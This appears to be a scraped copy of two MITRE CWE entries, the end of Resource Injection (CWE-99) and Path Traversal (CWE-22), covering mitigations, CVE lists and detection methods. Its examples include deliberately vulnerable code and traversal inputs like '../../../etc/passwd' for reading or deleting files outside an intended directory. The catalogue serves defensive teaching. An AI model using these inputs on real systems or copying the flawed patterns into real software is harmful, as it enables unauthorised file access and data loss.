Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, it can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	641	Improper Restriction of Names for Files and Other Resources
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	694	Use of Multiple Resources with Duplicate Identifier
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	914	Improper Control of Dynamically-Identified Variables
PeerOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	706	Use of Incorrectly-Resolved Name or Reference
CanAlsoBe	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	73	External Control of File Name or Path

Relevant to the view "Architectural Concepts" (View-1008)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1019	Validate Inputs

Modes Of Introduction

Phase	Note
Architecture and Design
Implementation	REALIZATION: This weakness is caused during implementation of an architectural security tactic.

Applicable Platforms

Languages

Class: Not Language-Specific (Undetermined Prevalence)

Likelihood Of Exploit

High

Demonstrative Examples

Example 1

The following Java code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files.

(bad code)

Example Language: Java

String rName = request.getParameter("reportName");
File rFile = new File("/usr/local/apfr/reports/" + rName);
...
rFile.delete();

Example 2

The following code uses input from the command line to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can create soft links to the file, they can use the program to read the first part of any file on the system.

(bad code)

Example Language: C++

ifstream ifs(argv[0]);
string s;
ifs >> s;
cout << s;

The kind of resource the data affects indicates the kind of content that may be dangerous. For example, data containing special characters like period, slash, and backslash, are risky when used in methods that interact with the file system. (Resource injection, when it is related to file system resources, sometimes goes by the name "path manipulation.") Similarly, data that contains URLs and URIs is risky for functions that create remote connections.

Selected Observed Examples

Reference	Description
CVE-2013-4787	chain: mobile OS verifies cryptographic signature of file in an archive, but then installs a different file with the same name that is also listed in the archive.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)

Detection Methods

Method

Details

Automated Static Analysis

Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	813	OWASP Top Ten 2010 Category A4 - Insecure Direct Object References
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	932	OWASP Top Ten 2013 Category A4 - Insecure Direct Object References
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	990	SFP Secondary Cluster: Tainted Input to Command
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1005	7PK - Input Validation and Representation
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1308	CISQ Quality Measures - Security
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1340	CISQ Data Protection Measures
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1347	OWASP Top Ten 2021 Category A03:2021 - Injection
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1409	Comprehensive Categorization: Injection
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1440	OWASP Top Ten 2025 Category A05:2025 - Injection

Vulnerability Mapping Notes

Usage	ALLOWED-WITH-REVIEW (this CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review)
Reason	Abstraction
Rationale	This CWE entry is a Class and might have Base-level children that would be more appropriate
Comments	Examine children of this entry to see if there is a better fit

Notes

Relationship

Resource injection that involves resources stored on the filesystem goes by the name path manipulation (CWE-73).

Maintenance

The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 "Resource Injection," as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the "identifier used to access a system resource" such as a file name or port number, yet it explicitly states that the "resource injection" term does not apply to "path manipulation," which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Mapped Node Name
7 Pernicious Kingdoms		Resource Injection
Software Fault Patterns	SFP24	Tainted input to command
OMG ASCSM	ASCSM-CWE-99

Related Attack Patterns

CAPEC-ID	Attack Pattern Name
CAPEC-10	Buffer Overflow via Environment Variables
CAPEC-240	Resource Injection
CAPEC-75	Manipulating Writeable Configuration Files

References

[REF-6]	Katrina Tsipenyuk, Brian Chess and Gary McGraw. "Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors". NIST Workshop on Software Security Assurance Tools Techniques and Metrics. NIST. 2005-11-07. <https://samate.nist.gov/SSATTM_Content/papers/Seven%20Pernicious%20Kingdoms%20-%20Taxonomy%20of%20Sw%20Security%20Errors%20-%20Tsipenyuk%20-%20Chess%20-%20McGraw.pdf>.
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-99. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	7 Pernicious Kingdoms
2006-07-19 (CWE Draft 3, 2006-07-19)
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Relationships
2023-10-26	CWE Content Team	MITRE
2023-10-26	updated Observed_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Detection_Factors, Relationships
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Description
2021-10-28	CWE Content Team	MITRE
2021-10-28	updated Relationships
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Other_Notes, Potential_Mitigations, References, Relationships, Type
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, White_Box_Definitions
2017-05-03	CWE Content Team	MITRE
2017-05-03	updated Related_Attack_Patterns, Relationships
2017-01-19	CWE Content Team	MITRE
2017-01-19	updated Relationships
2015-12-07	CWE Content Team	MITRE
2015-12-07	updated Relationships
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Relationships, Taxonomy_Mappings
2014-06-23	CWE Content Team	MITRE
2014-06-23	updated Alternate_Terms, Description, Relationship_Notes, Relationships
2013-07-17	CWE Content Team	MITRE
2013-07-17	updated Relationships
2013-02-21	CWE Content Team	MITRE
2013-02-21	updated Alternate_Terms, Maintenance_Notes, Other_Notes, Relationships
2012-10-30	CWE Content Team	MITRE
2012-10-30	updated Potential_Mitigations
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Common_Consequences, Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences, Other_Notes
2009-07-27	CWE Content Team	MITRE
2009-07-27	updated White_Box_Definitions
2009-07-17	KDM Analytics
2009-07-17	Improved the White_Box_Definition
2009-05-27	CWE Content Team	MITRE
2009-05-27	updated Description, Name
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2008-08-01		KDM Analytics
2008-08-01	added/updated white box definitions
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Time_of_Introduction
Previous Entry Names
Change Date	Previous Entry Name
2008-04-11	Resource Injection
2009-05-27	Insufficient Control of Resource Identifiers (aka 'Resource Injection')

Weakness ID: 22

View customized information:

Description

Extended Description

Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as "/usr/local/bin" to access unexpected files. This is referred to as absolute path traversal.

Alternate Terms

Directory traversal
Path traversal	"Path traversal" is preferred over "directory traversal," but both terms are attack-focused.

Common Consequences

Impact	Details
Execute Unauthorized Code or Commands	Scope: Integrity, Confidentiality, Availability The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.
Modify Files or Directories	Scope: Integrity The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.
Read Files or Directories	Scope: Confidentiality The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.
DoS: Crash, Exit, or Restart	Scope: Availability The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the product from working at all and in the case of protection mechanisms such as authentication, it has the potential to lock out product users.

Potential Mitigations

Phase(s)	Mitigation
Implementation	Strategy: Input Validation Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Architecture and Design	For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Implementation	Strategy: Input Validation Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes: realpath() in C getCanonicalPath() in Java GetFullPath() in ASP.NET realpath() or abs_path() in Perl realpath() in PHP
Architecture and Design	Strategy: Libraries or Frameworks Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Operation	Strategy: Firewall Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481]. Effectiveness: Moderate Note: An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.
Architecture and Design; Operation	Strategy: Environment Hardening Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
Architecture and Design	Strategy: Enforcement by Conversion When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability.
Architecture and Design; Operation	Strategy: Sandbox or Jail Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails. Effectiveness: Limited Note: The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.
Architecture and Design; Operation	Strategy: Attack Surface Reduction Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately. This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.
Implementation	Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy.
Operation; Implementation	Strategy: Environment Hardening When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	706	Use of Incorrectly-Resolved Name or Reference
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	23	Relative Path Traversal
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	36	Absolute Path Traversal
CanFollow	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	20	Improper Input Validation
CanFollow	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	73	External Control of File Name or Path
CanFollow	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	172	Encoding Error
CanPrecede	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	668	Exposure of Resource to Wrong Sphere

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1219	File Handling Issues

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	706	Use of Incorrectly-Resolved Name or Reference

Relevant to the view "CISQ Quality Measures (2020)" (View-1305)

Nature	Type	ID	Name
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	23	Relative Path Traversal
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	36	Absolute Path Traversal

Relevant to the view "CISQ Data Protection Measures" (View-1340)

Nature	Type	ID	Name
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	23	Relative Path Traversal
ParentOf	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	36	Absolute Path Traversal

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages	Class: Not Language-Specific (Undetermined Prevalence)
Technologies	AI/ML (Undetermined Prevalence)

Likelihood Of Exploit

High

Demonstrative Examples

Example 1

The following code could be for a social networking application in which each user's profile information is stored in a separate file. All files are stored in a single directory.

(bad code)

Example Language: Perl

my $dataPath = "/users/cwe/profiles";
my $username = param("user");
my $profilePath = $dataPath . "/" . $username;

open(my $fh, "<", $profilePath) || ExitError("profile read error: $profilePath");
print "<ul>\n";
while (<$fh>) {

print "<li>$_</li>\n";

}
print "</ul>\n";

While the programmer intends to access files such as "/users/cwe/profiles/alice" or "/users/cwe/profiles/bob", there is no verification of the incoming user parameter. An attacker could provide a string such as:

(attack code)

../../../etc/passwd

The program would generate a profile pathname like this:

(result)

/users/cwe/profiles/../../../etc/passwd

When the file is opened, the operating system resolves the "../" during path canonicalization and actually accesses this file:

(result)

/etc/passwd

As a result, the attacker could read the entire text of the password file.

Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined.

Example 2

In the example below, the path to a dictionary file is read from a system property and used to initialize a File object.

(bad code)

Example Language: Java

String filename = System.getProperty("com.domain.application.dictionaryFile");
File dictionaryFile = new File(filename);

However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory.

Example 3

The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.

(bad code)

Example Language: Perl

my $Username = GetUntrustedInput();
$Username =~ s/\.\.\///;
my $filename = "/home/user/" . $Username;
ReadAndSendFile($filename);

Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as:

(attack code)

../../../etc/passwd

will have the first "../" stripped, resulting in:

(result)

../../etc/passwd

This value is then concatenated with the /home/user/ directory:

(result)

/home/user/../../etc/passwd

which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23).

Example 4

The following code attempts to validate a given input path by checking it against an allowlist and once validated delete the given file. In this specific case, the path is considered valid if it starts with the string "/safe_dir/".

(bad code)

Example Language: Java

String path = getInputPath();
if (path.startsWith("/safe_dir/"))
{

File f = new File(path);
f.delete()

}

An attacker could provide an input such as this:

(attack code)

/safe_dir/../important.dat

The software assumes that the path is valid because it starts with the "/safe_path/" sequence, but the "../" sequence will cause the program to delete the important.dat file in the parent directory

Example 5

The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet.

(good code)

Example Language: HTML

<form action="FileUploadServlet" method="post" enctype="multipart/form-data">

Choose a file to upload:
<input type="file" name="filename"/>
<br/>
<input type="submit" name="submit" value="Submit"/>

</form>

When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.

(bad code)

Example Language: Java

public class FileUploadServlet extends HttpServlet {

...

protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

response.setContentType("text/html");
PrintWriter out = response.getWriter();
String contentType = request.getContentType();

// the starting position of the boundary header
int ind = contentType.indexOf("boundary=");
String boundary = contentType.substring(ind+9);

String pLine = new String();
String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value

// verify that content type is multipart form data
if (contentType != null && contentType.indexOf("multipart/form-data") != -1) {

// extract the filename from the Http header
BufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));
...
pLine = br.readLine();
String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\""));
...

// output the file to the local upload directory
try {

BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));
for (String line; (line=br.readLine())!=null; ) {

if (line.indexOf(boundary) == -1) {

bw.write(line);
bw.newLine();
bw.flush();

}

} //end of for loop
bw.close();

} catch (IOException ex) {...}
// output successful upload response HTML page

}
// output unsuccessful upload response HTML page
else
{...}

}

...

}

This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.

Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash.

Example 6

This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an error is printed to the user.

(bad code)

Example Language: Python

import os
import sys
def main():

filename = sys.argv[1]
path = os.path.join(os.getcwd(), filename)
try:

with open(path, 'r') as f:

file_data = f.read()

except FileNotFoundError as e:

print("Error - file not found")

main()

However, if the user supplies an absolute path, the os.path.join() function will discard the path to the current working directory and use only the absolute path provided. For example, if the current working directory is /home/user/documents, but the user inputs /etc/passwd, os.path.join() will use only /etc/passwd, as it is considered an absolute path. In the above scenario, this would cause the script to access and read the /etc/passwd file.

(good code)

Example Language: Python

import os
import sys
def main():

filename = sys.argv[1]
path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}")
if path.startswith("/home/cwe/documents/"):

try:

with open(path, 'r') as f:

file_data = f.read()

except FileNotFoundError as e:

print("Error - file not found")

main()

The constructed path string uses os.sep to add the appropriate separation character for the given operating system (e.g. '\' or '/') and the call to os.path.normpath() removes any additional slashes that may have been entered - this may occur particularly when using a Windows path. The path is checked against an expected directory (/home/cwe/documents); otherwise, an attacker could provide relative path sequences like ".." to cause normpath() to generate paths that are outside the intended directory (CWE-23). By putting the pieces of the path string together in this fashion, the script avoids a call to os.path.join() and any potential issues that might arise if an absolute path is entered. With this version of the script, if the current working directory is /home/cwe/documents, and the user inputs /etc/passwd, the resulting path will be /home/cwe/documents/etc/passwd. The user is therefore contained within the current working directory as intended.

Selected Observed Examples

Reference	Description
CVE-2024-37032	Large language model (LLM) management tool does not validate the format of a digest value (CWE-1287) from a private, untrusted model registry, enabling relative path traversal (CWE-23), a.k.a. Probllama
CVE-2024-4315	Chain: API for text generation using Large Language Models (LLMs) does not include the "\" Windows folder separator in its denylist (CWE-184) when attempting to prevent Local File Inclusion via path traversal (CWE-22), allowing deletion of arbitrary files on Windows systems.
CVE-2024-0520	Product for managing datasets for AI model training and evaluation allows both relative (CWE-23) and absolute (CWE-36) path traversal to overwrite files via the Content-Disposition header
CVE-2022-45918	Chain: a learning management tool debugger uses external input to locate previous session logs (CWE-73) and does not properly validate the given path (CWE-20), allowing for filesystem path traversal using "../" sequences (CWE-24)
CVE-2019-20916	Python package manager does not correctly restrict the filename specified in a Content-Disposition header, allowing arbitrary file read using path traversal sequences such as "../"
CVE-2022-31503	Python package constructs filenames using an unsafe os.path.join call on untrusted input, allowing absolute path traversal because os.path.join resets the pathname to an absolute path that is specified as part of the input.
CVE-2022-24877	directory traversal in Go-based Kubernetes operator app allows accessing data from the controller's pod file system via ../ sequences in a yaml file
CVE-2021-21972	Chain: Cloud computing virtualization platform does not require authentication for upload of a tar format file (CWE-306), then uses .. path traversal sequences (CWE-23) in the file to access unexpected files, as exploited in the wild per CISA KEV.
CVE-2020-4053	a Kubernetes package manager written in Go allows malicious plugins to inject path traversal sequences into a plugin archive ("Zip slip") to copy a file outside the intended directory
CVE-2020-3452	Chain: security product has improper input validation (CWE-20) leading to directory traversal (CWE-22), as exploited in the wild per CISA KEV.
CVE-2019-10743	Go-based archive library allows extraction of files to locations outside of the target folder with "../" path traversal sequences in filenames in a zip file, aka "Zip Slip"
CVE-2010-0467	Newsletter module allows reading arbitrary files using "../" sequences.
CVE-2006-7079	Chain: PHP app uses extract for register_globals compatibility layer (CWE-621), enabling path traversal (CWE-22)
CVE-2009-4194	FTP server allows deletion of arbitrary files using ".." in the DELE command.
CVE-2009-4053	FTP server allows creation of arbitrary directories using ".." in the MKD command.
CVE-2009-0244	FTP service for a Bluetooth device allows listing of directories, and creation or reading of files using ".." sequences.
CVE-2009-4013	Software package maintenance program allows overwriting arbitrary files using "../" sequences.
CVE-2009-4449	Bulletin board allows attackers to determine the existence of files using the avatar.
CVE-2009-4581	PHP program allows arbitrary code execution using ".." in filenames that are fed to the include() function.
CVE-2010-0012	Overwrite of files using a .. in a Torrent file.
CVE-2010-0013	Chat program allows overwriting files using a custom smiley request.
CVE-2008-5748	Chain: external control of values for user's desired language and theme enables path traversal.
CVE-2009-1936	Chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)
Resultant	(where the weakness is typically related to the presence of some other weaknesses)

Detection Methods

Method	Details
Automated Static Analysis	Automated techniques can find areas where path traversal weaknesses exist. However, tuning or customization may be required to remove or de-prioritize path-traversal problems that are only exploitable by the product's administrator - or other privileged users - and thus potentially valid behavior or, at worst, a bug instead of a vulnerability. Effectiveness: High
Manual Static Analysis	Manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all file access operations can be assessed within limited time constraints. Effectiveness: High
Automated Static Analysis - Binary or Bytecode	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Bytecode Weakness Analysis - including disassembler + source code weakness analysis Cost effective for partial coverage: Binary Weakness Analysis - including disassembler + source code weakness analysis Effectiveness: High
Manual Static Analysis - Binary or Bytecode	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies Effectiveness: SOAR Partial
Dynamic Analysis with Automated Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Web Application Scanner Web Services Scanner Database Scanners Effectiveness: High
Dynamic Analysis with Manual Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Fuzz Tester Framework-based Fuzzer Effectiveness: High
Manual Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Manual Source Code Review (not inspections) Cost effective for partial coverage: Focused Manual Spotcheck - Focused manual analysis of source Effectiveness: High
Automated Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Source code Weakness Analyzer Context-configured Source Code Weakness Analyzer Effectiveness: High
Architecture or Design Review	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Formal Methods / Correct-By-Construction Cost effective for partial coverage: Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) Effectiveness: High

Functional Areas

File Processing

Affected Resources

File or Directory

Memberships

Nature	Type	ID	Name
